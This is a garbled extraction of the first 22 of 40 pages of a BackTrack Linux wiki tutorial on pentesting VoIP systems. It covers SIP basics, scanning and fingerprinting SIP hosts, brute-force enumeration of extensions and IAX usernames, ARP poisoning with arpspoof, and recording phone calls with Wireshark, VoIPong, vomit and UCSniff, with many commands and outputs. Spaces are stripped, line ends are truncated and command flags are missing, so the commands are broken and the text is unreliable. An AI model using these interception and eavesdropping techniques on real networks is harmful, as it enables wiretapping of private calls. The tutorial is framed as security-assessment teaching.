Pentesting VOIP - BackTrack Linux

7/12/2015
PentestingVOIPBackTrackLinux
PentestingVOIP
FromBackTrackLinux
ThisarticlewascontributedbyNightRang3r.
URL:http://www.backtrack.de/index.php?page=team#smtx
Twitter:http://twitter.com/#!/NightRang3r
Email:shai@exploit.co.il
Contents
1PenetrationTestingVOIPwithBackTrack
2TypicalVoIPTopologies
2.1SelfHosted
2.2HostedServices
2.3OnlineSIPService
3SIPBasics
3.1SIPRequests/Methods
3.1.1AnExampleSIPINVITERequest:
3.2SIPResponses
3.2.1AnExampleSIPTryingResponse:
3.3SIPCallBetween2PhonesExample
4AttackVectors
5InformationGathering
5.1SMAP
5.1.1SMAPUsage:
5.1.2Scanningasinglehost:
5.1.3ScanningarangeofIPaddresses:
5.2SIPSAK
5.3SIPScan
5.3.1Sipscanusage:
5.3.2Scanningasubnet:
5.4SVMAP
5.4.1ScanninganIPrange:
5.4.2Enablingfingerprintingscanning
5.5ExtensionsEnumeration
5.5.1Svwar
5.5.1.1Usage:
5.5.1.2Example:
5.5.2Enumiax
6MonitoringTrafficandEavesdroppingPhonecalls
6.1ArpPoisoningusingArpspoof
6.2CapturingtrafficandEavesdroppingusingWireshark
6.3VoIPong
6.3.1Playingthefile:
6.4Vomit
6.5UCsniff
6.5.1MonitorModeUsage
http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP
1/40
7/12/2015
6.5.2MITMLearningModeUsage
6.5.3MITMTargetMode
6.6Xplico
6.7CapturingSIPAuthenticationusingSIPDump
7AttackingAuthentication
7.1CrackingSIPDigestresponsehashes
7.1.1SIPCrackUsage:
7.1.2Dictionaryattack
7.1.2.1Creatingasixcharsnumericdictionary:
7.1.2.2CrackingtheDigestResponse:
7.1.3BruteForceattackusingJohnTheRipper
7.2BruteforcingSIPAccounts
8VLANHopping
8.1VoIPHopper
8.2ACE
9DenialOfService
9.1Inviteflood
9.2Rtpflood
9.3Iaxflood
9.4Teardown
10SpoofingCallerID
11AttackingVoIPUsingMetasploit
11.1MetasploitVoIPModules
11.1.1Auxiliaries
11.1.2Exploits
11.2ScanningSIPEnabledDevices
11.3EnumeratingSIPextensions/Usernames
11.4SpoofingCallerIDauxiliary
11.5ExploitingVoIPsystems
12ClosingWords
13AboutTheAuthor
14References
PenetrationTestingVOIPwithBackTrack
VoIPisanexcitingtechnologywhichprovidesmanybenefitsandcosteffectivesolutionsforcommunication.Moreandm
andenterprisebusinessesarereplacingtheiroldtraditionaltelephonysystemswithanIPbasedones.AVoIPbasedPBX
providemanyfeaturessuchas:MultipleExtensions,CallerID,Voicemail,IVRcapabilities,Recordingofconversations,
Usagewithhardwarebasedtelephonesorsoftwarebased(akasoftphones).NowdaystherearemanyvendorsforPBX,I
telephones,VoIPservicesandequipmentsuchas:CISCO,AVAYAandASTERISK,SNOM,THOMSONWithnewt
comesanewchallengeforboththedefensiveandoffensivesideofsecurity,Oneofthegreatdangersoftraditionalpho
wasthatitwassusceptibletoeavesdropping.Theoldschoolwaytoeavesdroponsomebodysphonelinewastophysic
connectasmalltransmitterwhichwasconnectedinsideoroutsidetheirpremisessomewherealongthephonecord.
2/40
7/12/2015
IPtelephonysystemsarealsosusceptibletoeavesdropping,doingsoinanIPenvironmentisalittlebitmoredifficulttoe
detectandrequiremoretheknowledgeandtherightsetoftools.Inthisarticlewewontdiscussaparticularvendorortec
wewilltakealookattheconceptsandthetoolsavailableforattackingVoIPavailableforusinBacktrackLinux.Them
thisarticleistopresentthetoolsandtheirpurposeinordertohelpyouchoosetherighttoolfortherightsituation.Wewi
somerealworldattackvectorsanddiscoverhowBackTrackcanassistuspentestingVoIPwewillalsoexaminesomeo
whichpresentinBackTrackandtheirusage.
TypicalVoIPTopologies
ThereareseveralwaysIPbasedtelephonycanbeimplemented,herearesomecommontopologiesandusage:
SelfHosted
APBX(i.e.Asterisk)isinstalledattheclientsiteandconnectedtoanISPortelephonyserviceproviderPSTNviaaSIPT
theVoIPtrafficflowsthroughadedicatedVlan.
VisiodiagrambyAmirAvraham
HostedServices
ThereisnoneedforaPBXatsite.Justaswitch,arouter,IPphonesandaconnectiontotheserviceproviderPBXviainte
IP/VPNconnection,eachphoneisconfiguredwithSIPaccountinformation.
3/40
7/12/2015
OnlineSIPService
Serviceslikesipme.meprovidesanapplicationforpcorsmartphonesandafreesipaccount,Offeringlowpriceforinter
callsandfreecallsbetweentheserviceusersbyassigningaponenumbertoeachsubscriber.
4/40
7/12/2015
SIPBasics
TheSIP(SessionInitiationProtocol)roleistosetup,terminateormodifyavoiceoravideocallwherethevoiceand/orv
arebeingcarriedbyaprotocollikeRTP(RealtimetransportProtocol).SIPisanapplicationlayerprotocolwhichusesU
transport(TCPandSCTPcanbeusedaswell).
SIPusuallyusesports5060TCPorUDPforunencryptedsignalingor5061forencryptedtransportationusingTL
SIPisanASCIIbasedprotocolwhichhassomesimilarelementslikeintheHTTPprotocolbyusingaRequest/Response
MuchlikeanHTTPrequestfromabrowseraSIPclientrequestismadeusingaSIPURIauseragentandamethod/reque
usesemaillikeaddressesformat:user/phone@domain/ipAtypicalSIPURIlookslike:
sip:205@192.168.1.100,sip:username@pbx.com,sip:205@192.168.1.100:5060
Accordingtotherequestmadebytheclientaresponsewillbereceivedwithastatusorerrorcode,thefollowingtablesde
availablerequestsandresponsesintheSIPprotocol.
SIPRequests/Methods
Request
INVITE
ACK
CANCEL
REGISTER
OPTIONS
Description
Usedtoinviteandaccounttoparticipateinacallsession.
AcknowledgeanINVITErequest.
Cancelapendingrequest.
RegisteruserwithaSIPserver.
Listsinformationaboutthecapabilitiesofacaller.
5/40
7/12/2015
BYE
Terminatesasessionbetweentwousersinacall.
Indicatesthattherecipient(identifiedbytheRequestURI)
REFER
shouldcontactathirdpartyusingthecontactinformation
providedintherequest.
TheSUBSCRIBEmethodisusedtorequestcurrentstateand
SUBSCRIBE
stateupdatesfromaremote
node.
TheNOTIFYmethodisusedtonotifyaSIPnodethatanevent
NOTIFY
whichhasbeenrequestedbyanearlierSUBSCRIBEmethodhas
occurred.
AnExampleSIPINVITERequest:
INVITEsip:201@192.168.1.104SIP/2.0
Via:SIP/2.0/UDP192.168.1.102;rport;branch=z9hG4bKvbxaoqar
MaxForwards:70
To:
From:"NightRanger";tag=eihgg
CallID:hfxsabthoymshub@backtrack
CSeq:649INVITE
Contact:
ContentType:application/sdp
Allow:INVITE,ACK,BYE,CANCEL,OPTIONS,PRACK,REFER,NOTIFY,SUBSCRIBE,INFO,MESSAGE
Supported:replaces,norefersub,100rel
UserAgent:Twinkle/1.2
ContentLength:310
SIPResponses
Response
Description
Informationalresponses,Requestreceivedandbeing
1xx
processed.
SuccessfulresponsesTheactionwassuccessfullyreceived,
2xx
3xx
understood,andaccepted.
Redirectionresponses
RequestfailureresponsesTherequestcontainsbadsyntaxor
4xx
cannotbefulfilledattheserver.
ServerfailureresponsesTheserverfailedtofulfillan
5xx
apparentlyvalidrequest.
6/40
7/12/2015
6xx
GlobalfailureresponsesTherequestcannotbefulfilledatany
server.
AnExampleSIPTryingResponse:
SIP/2.0100Trying
Via:SIP/2.0/UDP192.168.1.102;branch=z9hG4bKpmphujka;received=192.168.1.102;rport=5060
From:"NIghtRanger";tag=eihgg
To:
CallID:hfxsabthoymshub@backtrack
CSeq:650INVITE
UserAgent:AsteriskPBX
Allow:INVITE,ACK,CANCEL,OPTIONS,BYE,REFER,SUBSCRIBE,NOTIFY
Supported:replaces
Contact:
ContentLength:0
SIPCallBetween2PhonesExample
Thecallingphonesendsaninvite.
Thecalledphonesendsbackaresponseof100(Trying).
Thecalledphonethenstartstoringandsendsaresponseof180(Ringing).
Whenthecallerpicksupthephonethecalledphonesendsaresponseof200(OK).
ThecallingphonesendsanACKresponse.
ConversationbeginsviaRTP.
WhenthecallerhangsupthephoneaBYErequestissent.
Thecallingphonerespondswith200(OK).
AttackVectors
7/40
7/12/2015
BeforewegetstartedwiththetoolsletshavealookatsomecommonVoIPattackvectors:
InformationGathering,FootprintingandEnumeration.
MonitoringTrafficandeavesdroppingPhonecalls.
AttackingAuthentication.
VLANHopping.
DenialofService/Flooding.
SpoofingCallerID.
InordertotestthetoolsIhavesetupaTRIXBOXPBXSystemandcreated6extensions.Iwillbeusingtwosoftphones,
basedclientcalledTwinkleandthe2ndisaWindowsbasedclientcalledXLite.Iwillbeusingthelatestandgreatestrel
BacktrackLinuxwhichisR2.YoucanfindMostoftheVoIPattacktoolsinBacktrackunderthe/pentest/voip/direc
root@bt:~#cd/pentest/voip/
root@bt:/pentest/voip#
OryoucansimplynavigateusingtheKDEmenutotheBacktrackVoiceOverIPsubmenus:
InformationGathering
Thisphaseiswherewegatherinformationaboutthetopology,serversandclientstolearnasmuchinformationaswecan
launchasuccessfulattack.Whatweareinterestedinfindingislivehosts,PBXtypeandversion,VoIPservers/gateways,
(hardwareandsoftware)typesandversionsetcInsteadofenumeratingusernameswewillbeenumeratingSIPextens
takealookatsomeofthetoolswhichavailableinBacktracktohelpusfind,identifyandenumerateVoIPenableddevic
8/40
7/12/2015
SMAP
BacktrackincludesagreattoolcalledSMAPwhichisasimplescannerforSIPenableddevicesSMAPsendsoffvarious
requestsawaitingresponsesfromSIPenabledDSLrouter,proxiesanduseragents.
ItcouldbeconsideredamashupofNMAPandsipsak.
SMAPUsage:
root@bt:/pentest/voip/smap#./smap
smap0.6.0http://www.wormulon.net/
usage:smap[Options]
h:thishelp
d:increasedebugging
o:enablefingerprinting
O:enablemoreverbosefingerprinting
l:fingerprintlearningmode
t:TCPtransport
u:UDPtransport(default
P0:Treatallhostsasonlineskiphostdiscovery
p:destinationport
r:messagespersecondratelimit
D:SIPdomaintousewithoutleadingsip:
w:timeoutinmsec
Scanningasinglehost:
root@bt:/pentest/voip/smap#./smap192.168.1.104
192.168.1.104:ICMPreachable,SIPenabled
1hostscanned,1ICMPreachable,1SIPenabled(100.0%)
ScanningarangeofIPaddresses:
root@bt:/pentest/voip/smap#./smap192.168.1.130/24
192.168.1.0:ICMPunreachable,SIPdisabled
EDIT
256hostsscanned,7ICMPreachable,2SIPenabled(0.8%)
NowthatwehaveidentifiedsipenabledhostswecanuseSMAPtofingerprinttheserver/clienttypeandversion:
root@bt:/pentest/voip/smap#./smapO192.168.1.104
9/40
7/12/2015
bestguess(70%sure)fingerprint:
AsteriskPBXSVNtrunkr56579
IncaseSMAPcouldnotfingerprintourhostweusethelargumenttoputitinlearningmodetoprovidesomeusefulinfo
root@bt:/pentest/voip/smap#./smapl192.168.1.104
NOTICE:test_accept:"Accept:application/sdp"
NOTICE:test_allow:"Allow:INVITE,ACK,CANCEL,OPTIONS,BYE,REFER,SUBSCRIBE,NOTIFY"
NOTICE:test_supported:"Supported:replaces"
NOTICE:test_via:transportcapitalization:2
NOTICE:test_via:"branch;alias;received;rport"
NOTICE:test_via:Pleaseaddnewcmpstr
NOTICE:test_via:transportcapitalization:2
bestguess(70%sure)fingerprint:
AsteriskPBXSVNtrunkr56579
FINGERPRINTinformation:
newmethod=501
accept_class=2
allow_class=201
supported_class=8
via_class=2
hoe_class=ignore
options=200
brokenfromto=404
prack=481
ping=501
invite=200
AnotherusefulfeatureofSMAPisthedargumentwhichenablesdebugoutputforverbositytrytousetheoalongwith
thefingerprintingprocessindetails.
root@bt:/pentest/voip/smap#./smapd192.168.1.104
DEBUG:localIP:212.235.66.182
DEBUG:localIP:212.235.66.182
DEBUG:bind()successful
DEBUG:RAWsocketopen
DEBUG:moving1fromS_STARTtoS_PING
DEBUG:ICMPerrorEchoReply
DEBUG:192.168.1.104/1request:SIPOPTIONSrequest(valid)
DEBUG:responsebelongstotask1(192.168.1.104)
DEBUG:ACK:ACKsip:localhostSIP/2.0
Via:SIP/2.0/UDP212.235.66.182:12345;branch=z9hG4bK.56689;alias;received=192.168.1.105;rport=5060
From:;tag=6b9ae50e67345d3b
To:;tag=as14262fec
CallID:1992951560@212.235.66.182
CSeq:23915ACK
ContentLength:0
UserAgent:smap0.6.0
endofACK
DEBUG:destroyingtask1
SIPSAK
SIPSAKisusedfortestingSIPenabledapplicationsanddevicesusingtheOPTIONrequestmethodonly.Wecanuseitt
fingerprintandenumeration.Youwontfindsipsakinthe/pentest/voip/directoryyoucanexecuteitfromanylocation
typingsipsak.
root@bt:~#sipsak
sipsak0.9.6byNilsOhlmeier
10/40
7/12/2015
Copyright(C)20022004FhGFokus
Copyright(C)20042005NilsOhlmeier
reportbugstonils@sipsak.org
shoot:sipsak[fFILE][L]sSIPURI
trace:sipsakTsSIPURI
usrloc:sipsakU[I|M][bNUMBER][eNUMBER][xNUMBER][zNUMBER]sSIPURI
usrloc:sipsakI|M[bNUMBER][eNUMBER]sSIPURI
usrloc:sipsakU[CSIPURI][xNUMBER]sSIPURI
message:sipsakM[BSTRING][OSTRING][cSIPURI]sSIPURI
flood:sipsakF[eNUMBER]sSIPURI
random:sipsakR[tNUMBER]sSIPURI
additionalparameterineverymode:
[aPASSWORD][d][i][HHOSTNAME][lPORT][mNUMBER][n][N]
[rPORT][v][V][w]
hdisplaysthishelpmessage
Vprintsversionstringonly
fFILEthefilewhichcontainstheSIPmessagetosend
useforstandardinput
LdeactivateCR(\r)insertioninfiles
sSIPURIthedestinationserveruriinform
sip:[user@]servername[:port]
Tactivatesthetraceroutemode
Uactivatestheusrlocmode
Isimulatesasuccessfulcallswithitself
Msendsmessagestoitself
CSIPURIusethegivenuriasContactinREGISTER
bNUMBERthestartingnumberappendixtotheusername(default:0)
eNUMBERtheendingnumeroftheappendixtotheusername
oNUMBERsleepnumbermsbeforesendingnextrequest
xNUMBERtheexpiresheaderfieldvalue(default:15)
zNUMBERactivatesrandomlyremovingofuserbindings
Factivatesthefloodmode
Ractivatestherandommodues(dangerous)
tNUMBERthemaximumnumberoftrashedcharacterinrandommode
(default:requestlength)
lPORTthelocalporttouse(default:any)
rPORTtheremoteporttouse(default:5060)
pHOSTNAMErequesttarget(outboundproxy)
HHOSTNAMEoverwritesthelocalhostnameinallheaders
mNUMBERthevalueforthemaxforwardsheaderfield
nuseFQDNinsteadofIPsintheViaLine
ideactivatetheinsertionofaViaLine
aPASSWORDpasswordforauthentication
(ifomittedpassword="")
uSTRINGAuthenticationusername
dignoreredirects
veachvproducesmoreverbosity(max.3)
wextractIPfromthewarninginreply
gSTRINGreplacementforaspecialmarkinthemessage
Gactivatesreplacementofvariables
NreturnsexitcodesNagioscompliant
qSTRINGsearchforaRegExpinrepliesandreturnerror
onfailure
WNUMBERreturnNagioswarningifretrans>number
BSTRINGsendamessagewithstringasbody
OSTRINGContentDispositionvalue
PNUMBERNumberofprocessestostart
ANUMBERnumberoftestrunsandprintjusttimings
Susesameportforreceivingandsending
cSIPURIusethegivenuriasFrominMESSAGE
DNUMBERtimeoutmultiplierforINVITEtransactions
andreliabletransports(default:64)
ESTRINGspecifytransporttobeused
jSTRINGaddsadditionalheaderstotherequest
HereisanexampleforusingsipsaktofingerprintasipenableddeviceWecanseeintheresultthatthedevicewequeried
AudiocodesMP114FXSgateway.
root@bt:~#sipsakvvssip:192.168.1.221
messagereceived:
SIP/2.0200OK
Via:SIP/2.0/UDP127.0.1.1:51601;branch=z9hG4bK.18a1b21f;rport;alias
From:sip:sipsak@127.0.1.1:51601;tag=97ac9e5
To:sip:192.168.1.221;tag=1c1785761661
CallID:159042021@127.0.1.1
CSeq:1OPTIONS
Contact:
Supported:em,100rel,timer,replaces,path,resourcepriority
Allow:REGISTER,OPTIONS,INVITE,ACK,CANCEL,BYE,NOTIFY,PRACK,REFER,INFO,SUBSCRIBE,UPDATE
Server:AudiocodesSipGatewayMP114FXS/v.5.40A.040.005
XResources:telchs=4/0;mediachs=0/0
Accept:application/sdp,application/simplemessagesummary,message/sipfrag
ContentType:application/sdp
ContentLength:343
v=0
o=AudiocodesGW17857639801785763858INIP4192.168.1.221
s=PhoneCall
c=INIP4192.168.1.221
t=00
m=audio6000RTP/AVP1880127
a=rtpmap:18G729/8000
a=fmtp:18annexb=no
a=rtpmap:8PCMA/8000
a=rtpmap:0PCMU/8000
a=rtpmap:127telephoneevent/8000
a=fmtp:127015
a=ptime:20
a=sendrecv
a=rtcp:6001INIP4192.168.1.221
11/40
7/12/2015
**replyreceivedafter67.923ms**
SIP/2.0200OK
finalreceived
SIPScan
Sipscanisasimplescannerforsipenabledhostsitcanscanasinglehostoranentiresubnet.
Sipscanusage:
root@bt:/pentest/voip/sipscan#./sipscanhelp
./sipscanversion[unknown]callingGetopt::Std::getopts(version1.05),
runningunderPerlversion5.10.0.
Usage:sipscan[options]
vBeverbose.
iip|ifInterface/IPforSIPheaders(default:IPfromppp0)
pportremoteporttoscan.(default:5060)
lportlocaloriginofpackets.(default:5060)
dn[p]Waitnmsaftereachsentpacket(default:50ms)orif'p'is
given,sendnpacketspersecond(default:20)
wnWaitnmsforremaininganswers(default:2000ms)
Networkspeccontainsthewildcard*orrangesnm.
Scanningasubnet:
root@bt:/pentest/voip/sipscan#./sipscanieth0192.168.1.1254
192.168.1.20:GrandstreamHT502V1.2A1.0.1.35
192.168.1.22:AsteriskPBX
192.168.1.104:AsteriskPBX
192.168.1.128:FreeSWITCHmod_sofia/1.0.trunk16055
192.168.1.175:AsteriskPBX1.6.0.9samyr27
192.168.1.219:"ExelmindCallControlSwitch(CCS)"
192.168.1.248:MailVisionHostLynx/2.1'GA'
SVMAP
SVMAPisapartofasuiteoftoolscalledSIPViciousanditsmyfavoritescannerofchoiceItcanbeusedtoscanidentif
fingerprintasingleIPorarangeofIPaddresses.Svmapallowsspecifyingtherequestmethodwhichisbeingusedforsca
defaultmethodisOPTIONS,itoffersdebugandverbosityoptionsandevenallowsscanningtheSRVrecordsforSIPon
destinationdomain.Youcanusethe./svmaphinordertoviewalltheavailablearguments
root@bt:/pentest/voip/sipvicious#./svmap.py
Usage:svmap.py[options]host1host2hostrange
examples:
svmap.py10.0.0.110.0.0.255\
>172.16.131.1sipvicious.org/2210.0.1.1/24\
>1.1.1.1201.1.220.*4.1.*.*
svmap.pyssession1randomize10.0.0.1/8
svmap.pyresumesession1v
svmap.pyp5060506210.0.0.320mINVITE
ScanninganIPrange:
12/40
7/12/2015
root@bt:/pentest/voip/sipvicious#./svmap.py192.168.1.1254
|SIPDevice|UserAgent|Fingerprint|
|192.168.1.104:5060|AsteriskPBX|disabled|
|192.168.1.103:5060|Twinkle/1.4.2|disabled|
Enablingfingerprintingscanning
root@bt:/pentest/voip/sipvicious#./svmap.py192.168.1.1254fp
ExtensionsEnumeration
ExtensionenumerationcanaidanattackerbyfindingvalidextensionsonaVoIPsystemwhichlatercanleadtoabrutefo
ontheSIPaccounts.ExtensionenumerationworksbyexaminingerrorsreturnedbyasiprequestsmethodslikeREGISTE
OPTIONSandINVITE
Svwar
Svwarisalsoatoolfromthesipvicioussuiteallowstoenumerateextensionsbyusingarangeofextensionsorusingadic
svwarsupportsalltheofthethreeextensionenumerationmethodsasmentionedabove,thedefaultmethodforenumeratio
REGISTER.
Usage:
root@bt:/pentest/voip/sipvicious#./svwar.py
Usage:svwar.py[options]target
examples:
svwar.pye10099910.0.0.1
svwar.pyddictionary.txt10.0.0.2
13/40
7/12/2015
Example:
root@bt:/pentest/voip/sipvicious#./svwar.pye100400192.168.1.104
|Extension|Authentication|
|201|reqauth|
|200|reqauth|
|203|reqauth|
|202|reqauth|
|303|reqauth|
|305|reqauth|
SvwarhasidentifiedalltheextensionsIvecreatedonmyTrixboxserver.Youcanspecifyanothersipmethodbyusingth
argument,youcanalsoaddtvorvvforverbosity.
root@bt:/pentest/voip/sipvicious#./svwar.pye100400192.168.1.104mINVITEv
INFO:TakeASip:tryingtogetselfip..mighttakeawhile
INFO:root:startyourengines
INFO:TakeASip:OkSIPdevicefound
INFO:TakeASip:extension'200'existsrequiresauthentication
Edit
INFO:root:wehave6extensions
|Extension|Authentication|
|201|reqauth|
|200|reqauth|
|203|reqauth|
|202|reqauth|
|303|reqauth|
|305|reqauth|
INFO:root:Totaltime:0:00:21.944731
Enumiax
EnumiaxisusedtoenumerateAsteriskExchangeprotocolusernames.ItallowsforadictionaryattackorasequentialUse
Guessing
root@bt:/pentest/voip/enumiax#./enumiax
enumIAX1.0
DustinD.Trammell
Usage:enumiax[options]target
options:
dDictionaryattackusingfile
iIntervalforautosave(#ofoperations,default1000)
m#Minimumusernamelength(incharacters)
M#Maximumusernamelength(incharacters)
r#Ratelimitcalls(inmicroseconds)
sReadsessionstatefromstatefile
vIncreaseverbosity(repeatforadditionalverbosity)
VPrintversioninformationandexit
hPrinthelp/usageinformationandexit
root@bt:/pentest/voip/enumiax#./enumiaxvm3M3192.168.1.104
enumIAX1.0
DustinD.Trammell
TargetAquired:192.168.1.104
Connectingto192.168.1.104viaudponport4569...
Startingenumprocessat:SatFeb513:04:182011
Nowworkingon3characterusernames...
#################################
Tryingusername:"000"
#################################
#################################
#################################
#################################
#################################
#################################
14/40
7/12/2015
#################################
#################################
#################################
...
root@bt:/pentest/voip/enumiax#./enumiaxddictv192.168.1.104
enumIAX1.0
DustinD.Trammell
TargetAquired:192.168.1.104
Connectingto192.168.1.104viaudponport4569...
Startingenumprocessat:SatFeb513:02:392011
#################################
Tryingusername:"guest"
#################################
Tryingusername:"iaxtel"
#################################
Tryingusername:"iaxtel2"
#################################
#################################
#################################
#################################
#################################
#################################
Endofdictionaryfilereached,exiting.
MonitoringTrafficandEavesdroppingPhonecalls
MonitoringVoIPtrafficcanallowanattackercaptureSIPrequestsandRTPdatasentfromclientstoserverandback.Itc
twoattackvectors:
CapturingSIPauthentication(wewilllaterdiscussthistopicintheattackingauthenticationsection).
Eavesdroppingusersphonecalls.
Fordemonstrationpurposeswewillusethefollowingscenario:
15/40
7/12/2015
ForthisattackvectorwewillneedtoperformaManinTheMiddleAttackwhichwillrequirethefollowingsteps:
Arppoisoning/spoofing
Sniffingtraffic
DecodingRTPdatatoanaudiofile.
ArpPoisoningusingArpspoof
Beforewecanbegintosnifftrafficwewillneedtoarppoisonourswitch/gateway,wellbeusingatoolcalledArpspoof
locatedin/usr/sbin/ArpspooffolderinBacktrack,infactyoucanjustinvokeitfromanywherebytyping:arpspoof
canusearpspoofwewillneedtoenableIPforwarding:
root@bt:~#echo1>/proc/sys/net/ipv4/ip_forward
Arpspoofsyntaxshouldlookasfollows:
root@bt:~#arpspoof
Version:2.4
Usage:arpspoof[iinterface][ttarget]host
ForasuccessfulMITMattackwewillneedtospoofbothways:
arpspooftvictimgateway
arpspooftgatewayvictim
WewillletourArppoisoningruninthebackgroundwhileperformingacaptureusingWireshark.
CapturingtrafficandEavesdroppingusingWireshark
NowletsfireupWiresharktocapturesometraffic.WewillusethefollowingWiresharkcapturefilter:
notbroadcastandnotmulticastandhost192.168.1.118
16/40
7/12/2015
NowletsstartcapturingsometrafficWhilesniffingfortrafficUserBhaslaunchedtheXLitesoftphoneonhisdes
computeranddialedtouserAextension200.
Wiresharkhascapturedsometraffic,afterawhileIhavestoppedthecaptureprocessandsavedthesessionsintoafilecal
17/40
7/12/2015
sip.pcap.
WecanseethatwehavecapturedtheSIPtrafficbutforthissectionwearemoreinterestedintheRTPtrafficbecauseitc
actualconversationdata.
WiresharkhasaprettycoolfeaturetodecodecapturedVoIPcallsdataintoplayableaudioformatYoucanfindthisfeatur
Statistics>VoIPCallsmenu.
18/40
7/12/2015
VoIPong
VoIPongisautilitywhichdetectsallVoiceoverIPcallsonapipeline,andforthosewhichareG711encoded,dumpsact
conversationtoseparatewavefiles.ItsupportsSIP,H323,Cisco'sSkinnyClientProtocol,RTPandRTCP.VoIPongislo
Backtrack/pentest/voip/voipongdirectoryBeforewecanuseVoIPongwewillneedtomakesomechangestothevoipo
file:
root@bt:/pentest/voip/voipong#nanoetc/voipong.conf
soxpath=/usr/bin/sox
networksfile=/pentest/voip/voipong/etc/voipongnets
outdir=/pentest/voip/voipong/output/
device=eth0#yournetworkinterfacecardname
NowwecanstartVoIPongtocapturesomeVoIPconversations
root@bt:/pentest/voip/voipong#./voipongcetc/voipong.confd4f
19/40
7/12/2015
OnceVoIPongdetectsaphonecallitwillstartcaptureitonceitfinishVoIPongwillstopthecaptureprocessandwillren
playablewavefile.Allconversationwillbesavedintothe/pentest/voip/voipong/outputfolder
Playingthefile:
Vomit
VomitconvertsaCiscoIPphoneRTPconversationintoawavefilethatcanbeplayedwithordinarysoundplayers.Vom
tcpdumpoutputfile.InordertogetvomitupandrunningwewillneedtodownloadandinstallwaveplayGetithere:
http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/waveplay20010924.tar.gz.5731.html
root@bt:~#tarxzvfwaveplay20010924.tar.gz
20/40
7/12/2015
waveplay20010924/
waveplay20010924/Makefile
waveplay20010924/waveplay.c
waveplay20010924/waveplay.ja.1
waveplay20010924/wavefmt.h
waveplay20010924/README
waveplay20010924/waveplay.1
waveplay20010924/README.jp
root@bt:~#cdwaveplay20010924
root@bt:~/waveplay20010924#make
cccowaveplay.owaveplay.c
ccwaveplay.oowaveplay
root@bt:~/waveplay20010924#cpwaveplay/usr/bin/
root@bt:/pentest/voip/vomit#./vomitrsip.dump|waveplayS8000B16C1
UCsniff
UCSniffisaVoIP&IPVideoSecurityAssessmenttoolthatintegratesexistingopensourcesoftwareintoseveraluseful
allowingVoIPandIPVideoownersandsecurityprofessionalstorapidlytestforthethreatofunauthorizedVoIPandV
Eavesdropping.UCSniffsupportsArppoisoning,VLANHopping,VLANDiscoveryviaCDP,ithasasniffercapabilitie
moreIconsideritasanallinoneeavesdroppingtool.Letstakealookatsomeusageexamples:
UCSniffcanoperatein2modes
MonitormodeShouldbeusedonasharedmediawheretheIPphonesconnectedtoi.e:aHUB,wirelessacces
canbealsobeusedinaswitchedenvironmentbysettingupaSPANsessionsonaCiscoswitch.
ManinthemiddlemodeThismodehas2additionalmodeswhichare
LearningMode
TargetedMode
PreparingUCSniffsowecanrunitfromanylocationinbacktrack:
root@bt:/tmp#cd/pentest/voip/ucsniff/
root@bt:/pentest/voip/ucsniff#./configure
root@bt:/pentest/voip/ucsniff#make
root@bt:/pentest/voip/ucsniff#makeinstall
MonitorModeUsage
root@bt:/tmp/ucsniff#ucsniffieth0M
UCSniff2.1starting
RunninginMonitorMode
Filedirectoryusers.txtcan'tbeopenedforreadinginworkingdirectory
Filetargets.txtcan'tbeopenedforreadinginworkingdirectory
Listeningoneth0...(Ethernet)
eth0>00:0C:29:84:98:B2192.168.1.105255.255.255.0
StartingUnifiedsniffing...
Warning:Pleaseensurethatyouhit'q'whenyouarefinishedwiththisprogram.
Warning:'q'reARPsthevictims.FailuretodosobeforeprogramexitwillresultinaDoS.
SIPCallinprogress.(extension200,ip192.168.1.104)calling(extension201,ip192.168.1.118)
SIPCallended.Conversationrecordedinfile'200Calling2015:2:73both.wav'
Closingtextinterface...
Unifiedsniffingwasstopped.
WecanstopthesessionsbypressingontheQkey.
SeveralfileswerecreatedbyUCSniff:LogfilesContainsdetailedinformationaboutsiptransactionsPcapfilescaptur
whichcanbeviewedinwiresharkaudiowavfilesconversationaudiofiles
21/40
7/12/2015
root@bt:/tmp/ucsniff#lsl
total376
rwrr1rootroot40854Feb505:02200Calling2015:2:73both.wav
rwrr1rootroot115818Feb505:02200Calling2015:2:73.pcap
rwrr1rootroot46294Feb505:02200Calling2015:2:82both.wav
rwrr1rootroot103940Feb505:02200Calling2015:2:82.pcap
rwrr1rootroot278Feb505:02call_detail_log
rwrr1rootroot317Feb505:02call_log
rwrr1rootroot10063Feb505:02sip.log
rwrr1rootroot39073Feb505:02sipdump.pcap
rwrr1rootroot0Feb505:01skinny_log
MITMLearningModeUsage
Thismodeusesasignalingprotocol(SIP,Skinny)tomapextensionstoanIPAddresses.Youcancustomizethetargetsto
interceptspecificIPAddressesorNetworks.InthefollowingexampleweassumeweareontheVoIPVLANUCSniffwi
poisonallhostsonthesubnet.
root@bt:/tmp/ucsniff#ucsniffieth0////
UCSniff2.1starting
Listeningoneth0...(Ethernet)
eth0>00:0C:29:84:98:B2192.168.1.105255.255.255.0
Randomizing255hostsforscanning...
Scanningthewholenetmaskfor255hosts...
*|==================================================>|100.00%
ARPpoisoningvictims:
GROUP1:ANY(allthehostsinthelist)
GROUP2:ANY(allthehostsinthelist)
Mappednewtargetentry:(IP:192.168.1.118)>extension201andname:Mappednewtargetentry:(IP:192.168.1.104)>extension200andname:
Closingtextinterface...
ARPpoisonerdeactivated.
REARPingthevictims...
Unifiedsniffingwasstopped.
IfwetakealookatUCSnifflogfileswecanseethediscoveredtargetsusedintheattack.
root@bt:/tmp/ucsniff#cattargets.txt
192.168.1.118,201,,sip
192.168.1.104,200,,sip
MITMTargetMode
TargetModeenablesEavesdroppingatalayerhigherthanjustrandomaudiostreamsortheIPaddressofphonesforwhic
knowtheextension.Thismodehas2submodes:TargetedUserTargetedConversationWecanaddtargetsmanuallytoth
targets.txtfileinthefollowingformat:x.x.x.x,extension,,sip192.168.1.118,201,,sipOruselearningmodetoautodisco
root@bt:/tmp/ucsniff#ucsniffieth0T
UCSniff2.1starting
Filetargets.txtcan'tbeopenedforreadinginworkingdirectory
NotargetshavebeenpreviouslydiscoveredinTargetsfile,targets.txt
PleaserunUCSniffinlearningmode,ormanuallyedittargets.txt
Onceavalidtargets.txtfileisfoundyouwillbeaskedtochooseaneavesdroppingmode:
root@bt:/tmp/ucsniff#ucsniffieth0T
UCSniff2.1starting
Parsed2entriesinTargetsfile,targets.txt
UCSniffrunningintargetmode.Parsed2previouslydiscoveredtargets
PleaseselectaTargetedEavesdroppingMode:
1.User
Description:Eavesdroponallcallstoorfromaparticularendpoint.
2.Conversation
Description:Eavesdroponbidirectionalconversationflowsbetweentwoselectedendpoints.
Pleaseselectoption(1)or(2):
22/40
7/12/2015
